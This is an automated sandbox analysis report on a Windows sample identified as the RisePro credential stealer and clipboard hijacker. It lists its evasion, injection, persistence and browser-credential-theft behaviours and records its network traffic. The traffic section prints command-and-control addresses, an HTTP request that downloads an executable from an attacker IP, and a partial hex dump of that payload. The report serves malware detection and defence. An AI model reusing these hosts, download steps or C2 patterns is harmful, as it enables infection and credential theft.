Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1445936
MD5: 3d5808948d8fa538b14ddc5d1861202b
SHA1: 465557a1e5384105df4f388e960f2c8469bf7b98
SHA256: a22db49ce797ce6ac5d91a4791d9954f4c31397b01d362fb0d24ffb7e16cd8d5
Tags: exe

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to implement multi-threaded time evasion
Contains functionality to inject threads in other processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormally high CPU usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 65%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree, 3_2_02EC6B00
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02EC6000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 3_2_02EE6770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E31F9C FindClose,FindFirstFileExW,GetLastError, 3_2_02E31F9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA, 3_2_02E93F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E32022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_02E32022
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02E938D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError, 3_2_02EDFF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4FC2F FindFirstFileExW, 3_2_02E4FC2F

Networking

Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.6:49708 -> 185.172.128.82:80
Source: Traffic Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.6:49709
Source: global traffic TCP traffic: 192.168.2.6:49705 -> 185.172.128.136:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Wed, 22 May 2024 18:06:29 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Wed, 22 May 2024 06:47:19 GMTConnection: keep-aliveETag: "664d94f7-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 
17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 172.67.75.166 172.67.75.166
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8590 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,freeaddrinfo,WSACleanup,freeaddrinfo, 3_2_02EC8590
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.82/server/k/l2.exe
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.00000000074D5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2428053387.00000000074D4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4564079502.00000000074D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.82/server/k/l2.exe:(
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: BitLockerToGo.exe, 00000003.00000002.4565512563.00000000076E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2330090968.00000000076D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.0/g/ima:0m
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.4555150527.0000000002E00000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/4
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175AS3356
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000311F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555150527.0000000002E00000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175
Source: file.exe String found in binary or memory: https://login.chinacloudapi.cn/in
Source: file.exe String found in binary or memory: https://login.microsoftonline.com/illegal
Source: file.exe String found in binary or memory: https://login.microsoftonline.us/indefinite
Source: file.exe String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictin
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.;k
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000030E8000.00000004.00000020.00020000.00000000.sdmp, 9VicU2EcsIoeWuNiSqblWRg.zip.3.dr String found in binary or memory: https://t.me/RiseProSUPPORT
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTNOq
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.3.dr String found in binary or memory: https://t.me/risepro_bot
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: 3b6N2Xdh3CYwplaces.sqlite.3.dr, D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org#
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
